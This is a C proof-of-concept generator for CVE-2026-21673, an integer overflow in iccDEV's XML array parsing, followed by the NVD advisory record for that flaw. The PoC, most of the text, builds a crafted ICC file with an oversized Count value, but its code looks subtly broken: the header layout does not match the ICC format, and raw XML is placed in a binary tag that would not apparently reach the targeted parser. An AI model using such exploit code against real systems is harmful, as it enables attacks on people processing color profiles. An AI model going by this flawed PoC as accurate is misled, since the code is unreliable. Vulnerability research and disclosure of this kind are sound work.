CVE-2026-21673

// CVE-2026-21673 PoC - Malicious ICC Profile with overflow in ParseTextCountNum // This PoC demonstrates the vulnerability by creating a crafted ICC profile // that triggers integer overflow in CIccXmlArrayType::ParseTextCountNum() #include <stdio.h> #include <stdlib.h> #include <string.h> #pragma pack(push, 1) typedef struct { unsigned int signature; // 'ic' followed by profile class ID unsigned short major_version; unsigned short minor_version; unsigned short reserved; unsigned int platform; // Platform signature unsigned int color_space; // Color space data unsigned int pcs; // PCS (Profile Connection Space) unsigned int creation_date[8]; unsigned int signature2; // 'acsp' unsigned int primary_platform; unsigned int profile_flags; unsigned int device_manufacturer; unsigned int device_model; unsigned int device_attributes[2]; unsigned int rendering_intent; unsigned int pcs_illuminant[3]; unsigned int creator_signature; unsigned int profile_id[4]; } ICCProfileHeader; typedef struct { unsigned int tag_signature; unsigned int offset; unsigned int size; } ICCTagEntry; typedef struct { unsigned int type_signature; unsigned int reserved; unsigned int count; // Vulnerable: Large value triggers overflow unsigned char data[1]; } ICCXMLArrayType; #pragma pack(pop) // XML payload that triggers overflow in ParseTextCountNum // count value is crafted to cause integer overflow unsigned char xml_payload[] = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" "<Array type=\"XYZNumber\">" "<Count>4294967295</Count>" // Max uint32 - triggers underflow "<Values>" "0.5 0.5 0.5 " "</Values>" "</Array>"; int create_malicious_icc_profile(const char* filename) { FILE* fp = fopen(filename, "wb"); if (!fp) return -1; // Create header ICCProfileHeader header = {0}; header.signature = 0x69630100; // 'ic' + 0x01 (input device) header.major_version = 4; header.minor_version = 2; header.signature2 = 0x61637370; // 'acsp' header.color_space = 0x52474220; // 'RGB ' header.pcs = 0x58595A20; // 'XYZ ' // Write header fwrite(&header, sizeof(header), 1, fp); // Write tag table unsigned int tag_count = 1; fwrite(&tag_count, 4, 1, fp); ICCTagEntry tag = {0}; tag.tag_signature = 0x6D6C7563; // 'mluc' (multi-localized Unicode) tag.offset = sizeof(ICCProfileHeader) + 4 + sizeof(ICCTagEntry); tag.size = sizeof(xml_payload) + 100; fwrite(&tag, sizeof(tag), 1, fp); // Write malicious XML payload fwrite(xml_payload, sizeof(xml_payload), 1, fp); fclose(fp); return 0; } int main() { printf("CVE-2026-21673 PoC Generator\n"); printf("Creating malicious ICC profile...\n"); if (create_malicious_icc_profile("poc_cve_2026_21673.icc") == 0) { printf("PoC file created: poc_cve_2026_21673.icc\n"); printf("This file triggers overflow in CIccXmlArrayType::ParseTextCountNum()\n"); } return 0; } /* Usage: 1. Compile: gcc -o poc_cve_2026_21673 poc_cve_2026_21673.c 2. Run: ./poc_cve_2026_21673 3. The generated ICC file contains malformed XML array count 4. When processed by vulnerable iccDEV library, triggers overflow Note: This is for educational and security research purposes only. */

{"cve": {"id": "CVE-2026-21673", "sourceIdentifier": "[email protected]", "published": "2026-01-06T02:15:45.343", "lastModified": "2026-01-12T21:03:33.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have overflows and underflows in CIccXmlArrayType::ParseTextCountNum(). This vulnerability affects users of the iccDEV library who process ICC color profiles. This issue is fixed in version 2.3.1.1."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Las versiones 2.3.1 e inferiores tienen desbordamientos y subdesbordamientos en CIccXmlArrayType::ParseTextCountNum(). Esta vulnerabilidad afecta a los usuarios de la biblioteca iccDEV que procesan perfiles de color ICC. Este problema está solucionado en la versión 2.3.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-681"}, {"lang": "en", "value": "CWE-704"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.1", "matchCriteriaId": "0E50DFFC-9185-4969-85A7-6D3976699720"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/32740802ee14418bd14c429d7e2f142d92cd5c4f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/243", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-g66g-f82c-vgm6", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}